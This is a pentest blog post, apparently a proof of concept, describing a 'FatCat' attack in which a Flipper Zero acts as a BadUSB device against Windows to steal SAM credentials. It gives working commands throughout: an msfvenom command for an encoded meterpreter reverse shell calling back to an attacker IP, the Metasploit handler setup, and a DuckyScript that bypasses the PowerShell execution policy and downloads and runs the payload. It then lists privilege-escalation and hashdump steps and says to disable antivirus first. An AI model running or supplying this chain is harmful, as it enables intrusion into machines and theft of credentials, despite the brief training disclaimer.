{{tag>english blog it-security pentest}}

====== FatCat Attack PoC ======

<code text>
 _____     _    ____      _
|  ___|_ _| |_ / ___|__ _| |_
| |_ / _` | __| |   / _` | __|
|  _| (_| | |_| |__| (_| | |_
|_|  \__,_|\__|\____\__,_|\__|
Attack PoC
</code>

| @orange:This PoC is for demonstration and training purposes only - misuse is prohibited. strafbar((https://dejure.org/gesetze/StGB/202a.html)) |

===== Description =====

The objective is to extract relevant SAM data from the registry. For this purpose, the flipper is used as a BadUSB device. The PowerShell Execution Policy is to be bypassed and the required rights are to be secured with a privilege escalation. The following data is to be exfiltrated:

^ User ^ Password ^ Hash ^
| Host \ User |  |  |
| Host \ Admin |  |  |
| Domain \ Admin |  |  |
\\
\\
===== Procedure =====

  - Deactivate AV
  - Create payload
  - Start handler
  - BadUSB attack
  - Use RemoteShell to explore
  - Search for exploit
  - Apply exploit
  - Collect credentials
\\
\\
===== Documentation =====

^ Attack Chain Step ^ Attack Technique ^ Attack Tool ^
| @#D0FA58:**Weaponisation** | Exploit, Payload | msfvenom((https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blob/master/msfvenom)) |
| @#FACC2E:**Delivery** | Physical access, Injection | Flipper((https://flipperzero.one/)), BadUSB((https://grantonline.medium.com/flipper-zero-badusb-getting-started-with-duckyscript-f212fcdd5dec)) |
|::: | Bypass | PowerShell Restrictions((https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)) |
| @#2E9AFE:**Exploitation** | Reverse Shell | Metasploit((https://www.hackers-arise.com/post/2017/07/31/metasploit-basics-part-9-using-msfvenom-to-create-custom-payloads)) |
|::: | Enumeration | **Enumerate System Info** JAWS((https://github.com/411Hall/JAWS)), SessionGopher((https://github.com/Arvanaghi/SessionGopher)), weak Service Permissions((https://fuzzysecurity.com/tutorials/16.html)), Primary Access Token Manipulation((https://www.ired.team/offensive-security/privilege-escalation/t1134-access-token-manipulation)), Unquoted Service Path ((https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths)), PassTheHash ((https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/README.md)) ((https://www.ired.team/offensive-security/privilege-escalation/pass-the-hash-privilege-escalation-with-invoke-wmiexec)), BetterSafetyKatz (Builds local, obfuscating not complete), Search for local Exploits((https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/)) |
|::: | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) |
| @#58D3F7:**Actions on Objectives** | Exfiltration | Exfiltrate Data |
\\
\\
===== Preparations and attack =====

==== Metasploit payload ====

  * Start Metasploit
  * Open cmd

<code dos>cmd</code>

  * Generate payload

<code dos>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.77 LPORT=50666 -e x86/shikata_ga_nai -i 5 -f exe > msfpayload.exe</code>

  * Exit shell

<code dos>exit</code>

  * Store payload on a web server
\\
[{{it-security:blog:002-fc-msfvenom.png?400|Generate payload}}]
\\
==== Metasploit Handler ====

  * Start Multi Handler Server

<code ruby>
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.77
set LPORT 50666
exploit
</code>
\\
[{{it-security:blog:001-fc-handler.png?400|Configure and start Metasploit Handler}}]
\\
==== Access to the target system ====

  * With the pinball machine, the following script is executed on the target system

<code dos>
WINDOWS r
DELAY 2000
STRING powershell.exe
DELAY 3000
ENTER
DELAY 5000
STRING Set-ExecutionPolicy Bypass -Scope Process -force
DELAY 3000
ENTER
DELAY 3000
STRING irm https://<DEIN-COOLER-WEBSERVER>/msfpayload.exe -OutFile msfpayload.exe
DELAY 3000
ENTER
DELAY 5000
STRING Start-Process msfpayload.exe
DELAY 3000
ENTER
DELAY 3000
STRING exit
DELAY 1500
ENTER
</code>
\\
[{{it-security:blog:003-fc-flipperattack.png?400|Flipper attack is executed}}]
\\
==== Connection established - Metasploit does it ====

<code dos>
getsystem
hashdump
ls
getwd
cd c:
cd Glob_Share
ls
background
use post/multi/recon/local_exploit_suggester
sessions
set session 1
run
use exploit/windows/local/always_install_elevated
set session 1
exploit
cd glob_share
type Domain-Admin-Creds.txt
hashdump
sessions -i 1
</code>

[{{it-security:blog:004-fc-session.png?400|Meterpreter Session produced}}]
[{{it-security:blog:005-fc-exploitsearch.png?400|Automated Exploit Search for Privilege Escalation}}]
[{{it-security:blog:006-fc-privesc.png?400|Privilege Escalation successful}}]
[{{it-security:blog:007-fc-creds.png?400|Here are our searched credentials}}]